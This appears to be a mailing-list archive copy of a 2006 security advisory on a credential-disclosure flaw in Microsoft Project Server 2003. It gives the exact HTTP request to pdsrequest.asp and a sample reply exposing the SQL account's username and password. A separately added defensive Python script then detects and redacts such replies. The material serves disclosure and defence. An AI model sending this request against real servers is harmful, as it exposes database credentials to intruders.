Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: [NT] Project Server 2003 Credential Disclosure



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Wednesday, December 20, 2006 5:56 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Project Server 2003 Credential Disclosure
> 
> The following security advisory is sent to the securiteam 
> mailing list, and can be found at the SecuriTeam web site: 
> http://www.securiteam.com 
> 
> 
> Project Server 2003 Credential Disclosure 
> 
> 
> 
> Microsoft Project Server 2003 implements a thick client for 
> some of the functionality. The thick client uses XML requests 
> to talk to the server over HTTP(S). One of these requests 
> returns the username and password of the MSProjectUser 
> account used to access the SQL database as well as other 
> system information. 
> 
> 
> Exploit: 
> POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0 
> Accept: */* 
> Accept-Language: en-nz 
> Pragma: no-cache 
> Host: SERVER 
> Content-length: 87 
> Proxy-Connection: Keep-Alive 
> Cookie: PjSessionID=<valid cookie> 
> 
> <Request> 
> <GetInitializationData> 
> <Release>1</Release> 
> </GetInitializationData> 
> </Request> 
> 
> <Reply> 
> <HRESULT>0</HRESULT> 
> <STATUS>0</STATUS> 
> <UserName>theuser</UserName> 
> <GetInitializationData> 
> <GetLoginInformation> 
> <DBType>0</DBType> 
> <DVR>{SQLServer}</DVR> 
> <DB>ProjectServer</DB> 
> <SVR>SERVER</SVR> 
> <ResGlobalID>1</ResGlobalID> 
> <ResGlobalName>resglobal</ResGlobalName> 
> <UserName>MSProjectUser</UserName> <---- 
> <Password>sekretpass</Password> <---- 
> <UserNTAccount>SERVER\USER</UserNTAccount> 
> </GetLoginInformation> 
> </Reply> 
> 
> Some quick notes that mitigate this attack: 
>  * The cookie must be a valid cookie, which is obtained via a 
> login with a valid username and password. 
>  * Since the thick client is 'client side' any SQL can be 
> manipulated anyway. 
>  * The MSProjectUser should be a low-level account anyway. 
>  * Other 'undocumented' or 'unauthorized' requests 'may' also 
> be able to be made through this method. 
> 
> 
> Additional Information: 
> The information has been provided by Brett Moore 
> <mailto:brett.moore@xxxxxxxxxxxxxxxxxxxxxxx> . 
> 
> 
> 
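A defensive check for the reply shown in the advisory, as an added example that is not part of the original message: it inspects captured pdsrequest.asp response bodies for a GetLoginInformation block carrying a non-empty Password, reports the disclosed account without the secret, and redacts the body before it is stored. The function names and the sample reply (placeholder password) are constructed here.

```python
import re

# Constructed sample shaped like the advisory's reply; values are placeholders.
SAMPLE_REPLY = """<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<UserName>MSProjectUser</UserName>
<Password>EXAMPLE-PLACEHOLDER</Password>
</GetLoginInformation>
</Reply>"""

# Regexes instead of an XML parser: the reply as quoted in the advisory never
# closes <GetInitializationData>, so a strict parser would reject it.
_LOGIN_BLOCK = re.compile(
    r"<GetLoginInformation>(.*?)</GetLoginInformation>", re.S | re.I)
_FIELD = re.compile(r"<(UserName|Password|DB|SVR)>(.*?)</\1>", re.S | re.I)
_PASSWORD = re.compile(r"(<Password>).*?(</Password>)", re.S | re.I)


def inspect_reply(body):
    """Return a finding dict if the reply discloses DB credentials, else None."""
    block = _LOGIN_BLOCK.search(body)
    if not block:
        return None
    # Only fields inside the login block count; the outer <UserName> is the
    # logged-in Project Server user, not the database account.
    fields = {name.lower(): value.strip()
              for name, value in _FIELD.findall(block.group(1))}
    if not fields.get("password"):
        return None
    return {
        "db_account": fields.get("username", ""),
        "database": fields.get("db", ""),
        "server": fields.get("svr", ""),
        "password_length": len(fields["password"]),  # never log the secret
    }


def redact(body):
    """Blank every <Password> value so the body can be kept as evidence."""
    return _PASSWORD.sub(r"\1[REDACTED]\2", body)
```
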



 



